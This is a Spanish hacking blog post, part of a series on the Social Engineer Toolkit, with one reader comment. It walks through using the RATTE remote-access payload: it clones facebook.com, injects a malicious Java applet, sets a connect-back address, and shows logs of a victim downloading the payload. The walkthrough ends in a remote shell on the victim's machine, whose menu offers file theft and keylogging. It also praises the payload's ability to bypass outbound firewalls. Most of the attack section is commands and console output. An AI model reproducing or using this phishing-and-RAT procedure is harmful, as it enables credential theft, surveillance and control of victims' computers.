Inicio > Hacking, MetaSploit > Conceptos Básicos y Avanzados de SET (Social Engineer Toolkit) – Características avanzadas de SET – RATTE en SET – Parte VII

Conceptos Básicos y Avanzados de SET (Social Engineer Toolkit) – Características avanzadas de SET – RATTE en SET – Parte VII


Una de las ultimas características añadidas al framework de SET ha sido RATTE (Remote Administration Tool Tommy Edition) se trata de un payload que intenta evadir restricciones sobre el trafico saliente que pudieran existir en el segmento de red del objetivo, como por ejemplo un IDS o Firewall establecido en dicha red, este objetivo se consigue gracias a que todos los comandos que se ejecutan se realizan completamente por medio de una comunicación HTTP (tanto en el envío de la ejecución del comando como en el retorno de los resultados del mismo desde el cliente).

Otra característica importante y sumamente interesante de RATTE es que cuando se ejecuta sobre un navegador web como Firefox o IE, reemplaza algunas fracciones del código de dichos navegadores por código contenido en RATTE, de este modo cada vez que una víctima ejecute Firefox o IE estos contendrán pociones de RATTE en su ejecución interna. Finalmente, RATTE se basa en microsoft.com para identificar la ruta de salida de la red, ya que una petición a dicha ruta es catalogada como “confiable”.

Bien, después de indicar las características de RATTE (que no son pocas y que son realmente interesantes) se procede a indicar su uso desde SET.

Para utilizar este modulo se cuenta con dos opciones que conllevan al mismo destino, por un lado es posible utilizar este payload en un ataque web con un applet malicioso y por otro lado es posible utilizarlo desde la opción “Third Party Modules ” independiente del mecanismo elegido, el fin será exactamente el mismo.

Seleccionando Third Party Modules

Desde esta opción se procede a seleccionar un ataque con un applet de Java malicioso utilizando RATTE de la siguiente forma

set > 9

Welcome to the Social-Engineer Toolkit Third Party Modules menu.

Please read the readme/modules.txt for more information on how to create your

own modules.

1. RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first

2. RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) – Read the readme/RATTE_README.txt first

99. Return to the previous menu

set > modules > 2

Enter website to clone (ex. https://gmail.com): http://www.facebook.com

Enter your IP address to connect back on: 192.168.1.33

Enter port java applet should listen on (ex. 443): 443

Enter port RATTE Server should listen on (ex. 8080):

[*] preparing RATTE…

[*] Starting java applet attack…

[*] Cloning the website: http://www.facebook.com

[*] This could take a little bit…

[*] Injecting Java Applet attack into the newly cloned website.

[*] Filename obfuscation complete. Payload name is: 3FEryeX

[*] Malicious java applet website prepped for deployment

Site has been successfully cloned and is: reports/

[*] Starting ratteserver…

Welcome to RATTE

RATTE is published for education only!

Use only with written permission of target!

For more technical information and parts of source code

check out chapter “B.2 Entwicklung eines Sicherheitspruefprogrammes”

of “Die Kunst der digitalen Verteidigung”

-> http://www.cul.de/verteidigung.html

RATTE Server Menue

1) list clients

2) activate client

3) remove client

4) remove all clients

5) remove&delete Client

99) stop Server

Choose:

Posteriormente cuando una víctima selecciona ejecutar el applet, automaticamente la petición es tratada por RATTE

192.168.1.40 – – [14/Aug/2011 17:39:24] “GET / HTTP/1.1″ 200 –

192.168.1.40 – – [14/Aug/2011 17:39:30] code 404, message File not found

192.168.1.40 – – [14/Aug/2011 17:39:35] “GET /favicon.ico HTTP/1.1″ 404 –

192.168.1.40 – – [14/Aug/2011 17:39:40] “GET /Signed_Update.jar HTTP/1.1″ 200 –

192.168.1.40 – – [14/Aug/2011 17:39:49] “GET /3FEryeX HTTP/1.1″ 200 –

1

Warte auf Mutex

Clients:

0) ID:1

HTTP connection from 192.168.1.40 using Ratte

Connected at Sun Aug 14 17:40:02 2011

RATTE Server Menue

1) list clients

2) activate client

3) remove client

4) remove all clients

5) remove&delete Client

99) stop Server

Choose:

Como puede apreciarse, ahora desde la opción 1 (list clients) existe un cliente que se encuentra listo para ser tratado por RATTE con el identificador “1” ahora es necesario activar dicho cliente para disponer de los comandos existentes en RATTE

Choose: 2

Enter the session you want to interact with:

send activation request, may take 10 seconds

Client activated

Session Menue

1) start Shell

2) get File from Client

3) send File to Client

4) get Keylog to ./keylog.txt

5) Change Shell User

6) List Processes

7) Kill Process

8) Client bits File Download

99) close Session

Una vez el cliente ha sido activado, se enseña el menú de acciones disponibles en RATTE para ejecutar sobre la víctima. Por ejemplo:

Choose: 1

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Owner\Desktop>

dir

Volume in drive C has no label.

Volume Serial Number is 689A-D74E

Directory of C:\Documents and Settings\Owner\Desktop

23.07.2011 02:53 <DIR> .

23.07.2011 02:53 <DIR> ..

23.07.2011 02:53 834 Windows Media Player.lnk

1 File(s) 834 bytes

2 Dir(s) 11�238�354�944 bytes free

exit

1) start Shell

2) get File from Client

3) send File to Client

4) get Keylog to ./keylog.txt

5) Change Shell User

6) List Processes

7) Kill Process

8) Client bits File Download

99) close Session

Choose:

 Como puede apreciarse se puede establecer comunicación con la víctima realizando un “bypass” de las reglas del firewall para trafico saliente establecidas en el segmento de red de la víctima.

  1. darkus
    mayo 21, 2012 en 5:30 am

    hola, no entiendo que ocurre pero se me crea un bucle en esta parte:
    192.168.1.40 – – [14/Aug/2011 17:39:24] “GET / HTTP/1.1″ 200 –

    192.168.1.40 – – [14/Aug/2011 17:39:30] code 404, message File not found

    192.168.1.40 – – [14/Aug/2011 17:39:35] “GET /favicon.ico HTTP/1.1″ 404 –

    192.168.1.40 – – [14/Aug/2011 17:39:40] “GET /Signed_Update.jar HTTP/1.1″ 200 –

    192.168.1.40 – – [14/Aug/2011 17:39:49] “GET /3FEryeX HTTP/1.1″ 200 –

    1
    la fake page la carga bien pero no me abre sesion meterpreter… si tienes alguna idea…

  1. No trackbacks yet.

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

Únete a otros 1.066 seguidores

A %d blogueros les gusta esto: